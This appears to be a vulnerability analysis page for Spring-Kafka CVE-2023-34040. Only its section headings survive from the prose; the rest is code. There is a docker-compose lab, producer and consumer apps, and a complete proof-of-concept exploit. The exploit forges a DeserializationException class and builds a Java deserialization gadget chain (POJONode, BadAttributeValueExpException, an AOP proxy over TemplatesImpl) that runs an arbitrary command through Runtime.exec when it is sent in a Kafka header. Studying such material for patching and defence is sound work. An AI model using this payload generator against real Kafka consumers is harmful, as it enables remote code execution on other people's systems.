Spring-Kafka CVE-2023-34040
Preface
Kafka Intro


Quick Start


Analysis







Patch

Ref
Last updated












Last updated
version: '2'
services:
zookeeper:
image: confluentinc/cp-zookeeper:latest
environment:
ZOOKEEPER_CLIENT_PORT: 2181
ZOOKEEPER_TICK_TIME: 2000
ports:
- 22181:2181
kafka:
image: confluentinc/cp-kafka:latest
depends_on:
- zookeeper
ports:
- 29092:29092
environment:
KAFKA_BROKER_ID: 1
KAFKA_ZOOKEEPER_CONNECT: zookeeper:2181
KAFKA_ADVERTISED_LISTENERS: PLAINTEXT://192.168.73.129:29092
KAFKA_LISTENER_SECURITY_PROTOCOL_MAP: PLAINTEXT:PLAINTEXT,PLAINTEXT_HOST:PLAINTEXT
KAFKA_INTER_BROKER_LISTENER_NAME: PLAINTEXT
KAFKA_OFFSETS_TOPIC_REPLICATION_FACTOR: 1package com.demo.producer;
import org.apache.kafka.clients.admin.NewTopic;
import org.springframework.boot.ApplicationRunner;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.context.annotation.Bean;
import org.springframework.kafka.config.TopicBuilder;
import org.springframework.kafka.core.KafkaTemplate;
@SpringBootApplication
public class ProducerApplication {
public static void main(String[] args) {
SpringApplication.run(ProducerApplication.class, args);
}
@Bean
public NewTopic topic() {
return TopicBuilder.name("myTopic")
.partitions(10)
.replicas(1)
.build();
}
@Bean
public ApplicationRunner runner(KafkaTemplate<String, String> template) {
return args -> {
template.send("myTopic", "test");
};
}
}server.port=8080
spring.kafka.bootstrap-servers=192.168.73.129:29092package com.demo.comsumer;
import org.apache.kafka.clients.admin.NewTopic;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.context.annotation.Bean;
import org.springframework.kafka.annotation.KafkaListener;
import org.springframework.kafka.config.TopicBuilder;
@SpringBootApplication
public class ConsumerApplication {
public static void main(String[] args) {
SpringApplication.run(ConsumerApplication.class, args);
}
@Bean
public NewTopic topic() {
return TopicBuilder.name("myTopic")
.partitions(10)
.replicas(1)
.build();
}
@Autowired
private KafkaProperties kafkaProperties;
@Bean
public ConcurrentKafkaListenerContainerFactory<String, String> kafkaListenerContainerFactory() {
Map<String, Object> props = new HashMap<>();
props.put(ConsumerConfig.BOOTSTRAP_SERVERS_CONFIG, kafkaProperties.getBootstrapServers());
props.put(ConsumerConfig.KEY_DESERIALIZER_CLASS_CONFIG, StringDeserializer.class);
props.put(ConsumerConfig.VALUE_DESERIALIZER_CLASS_CONFIG, StringDeserializer.class);
ConcurrentKafkaListenerContainerFactory<String, String> factory = new ConcurrentKafkaListenerContainerFactory<>();
factory.setConsumerFactory(new DefaultKafkaConsumerFactory<>(props));
factory.getContainerProperties().setCheckDeserExWhenKeyNull(true);
factory.getContainerProperties().setCheckDeserExWhenValueNull(true);
return factory;
}
@KafkaListener(id = "myId", topics = "myTopic")
public void listen(String in) {
System.out.println(in);
}
}server.port=8088
spring.kafka.consumer.auto-offset-reset=earliest
spring.kafka.bootstrap-servers=192.168.73.129:29092import org.springframework.kafka.support.serializer.DeserializationException;
import java.io.ObjectStreamClass;
import java.lang.reflect.Constructor;
public class Calc {
public static void main(String[] args) throws Exception {
Class<?> clazz = Class.forName("java.io.ObjectStreamClass");
Constructor<?> con = clazz.getDeclaredConstructor(Class.class);
con.setAccessible(true);
ObjectStreamClass osc = (ObjectStreamClass) con.newInstance(DeserializationException.class);
System.out.println(osc.getSerialVersionUID());
}
}package xrg.springframework.kafka.support.serializer;
import java.io.Serializable;
public class DeserializationException implements Serializable {
private static final long serialVersionUID = 8280022391259546509L;
private Object evil;
public DeserializationException(Object evil) {
this.evil = evil;
}
}static {
try {
CtClass ctClass = ClassPool.getDefault().get("com.fasterxml.jackson.databind.node.BaseJsonNode");
CtMethod writeReplace = ctClass.getDeclaredMethod("writeReplace");
ctClass.removeMethod(writeReplace);
ctClass.toClass();
} catch (Exception e) {
throw new RuntimeException(e);
}
}
@Bean
public ApplicationRunner runner(KafkaTemplate<Object, Object> template) {
return args -> {
ProducerRecord<Object,Object> producerRecord = new ProducerRecord<>("myTopic","key",null);
producerRecord.headers().add("springDeserializerExceptionValue", PayloadGeneration.getPayload("calc"));
template.send(MessageBuilder
.withPayload("whatever")
.setHeader(KafkaHeaders.TOPIC, "myTopic")
.setHeader(SerializationUtils.KEY_DESERIALIZER_EXCEPTION_HEADER, PayloadGeneration.getPayload("calc")).build());
};
}package com.demo.producer;
import com.fasterxml.jackson.databind.node.POJONode;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtConstructor;
import org.springframework.aop.framework.AdvisedSupport;
import xrg.springframework.kafka.support.serializer.DeserializationException;
import javax.management.BadAttributeValueExpException;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
public class PayloadGeneration {
public static byte[] ser(final Object obj) throws Exception {
ByteArrayOutputStream baos = new ByteArrayOutputStream();
ObjectOutputStream oos= new ObjectOutputStream(baos);
oos.writeObject(obj);
return baos.toByteArray();
}
public static byte[] getPayload(String cmd) throws Exception {
POJONode node = new POJONode(makeTemplatesImplAopProxy(cmd));
BadAttributeValueExpException val = new BadAttributeValueExpException(null);
setFieldValue(val, "val", node);
DeserializationException exception = new DeserializationException(val);
byte[] data = ser(exception);
data[8] = "o".getBytes()[0]; // AC ED 00 05 74 00 05 68
return data;
}
public static Object makeTemplatesImpl(String cmd) throws Exception{
ClassPool pool = ClassPool.getDefault();
CtClass clazz = pool.makeClass("a");
CtClass superClass = pool.get(AbstractTranslet.class.getName());
clazz.setSuperclass(superClass);
CtConstructor constructor = new CtConstructor(new CtClass[]{}, clazz);
constructor.setBody("Runtime.getRuntime().exec(\"" + cmd + "\");");
clazz.addConstructor(constructor);
byte[][] bytes = new byte[][]{clazz.toBytecode()};
TemplatesImpl templates = TemplatesImpl.class.newInstance();
setFieldValue(templates, "_bytecodes", bytes);
setFieldValue(templates, "_name", "test");
setFieldValue(templates, "_tfactory", null);
return templates;
}
public static Object makeTemplatesImplAopProxy(String cmd) throws Exception {
AdvisedSupport advisedSupport = new AdvisedSupport();
advisedSupport.setTarget(makeTemplatesImpl(cmd));
Constructor constructor = Class.forName("org.springframework.aop.framework.JdkDynamicAopProxy").getConstructor(AdvisedSupport.class);
constructor.setAccessible(true);
InvocationHandler handler = (InvocationHandler) constructor.newInstance(advisedSupport);
Object proxy = Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(), new Class[]{Templates.class}, handler);
return proxy;
}
public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
Field field = obj.getClass().getDeclaredField(fieldName);
field.setAccessible(true);
field.set(obj, value);
}
}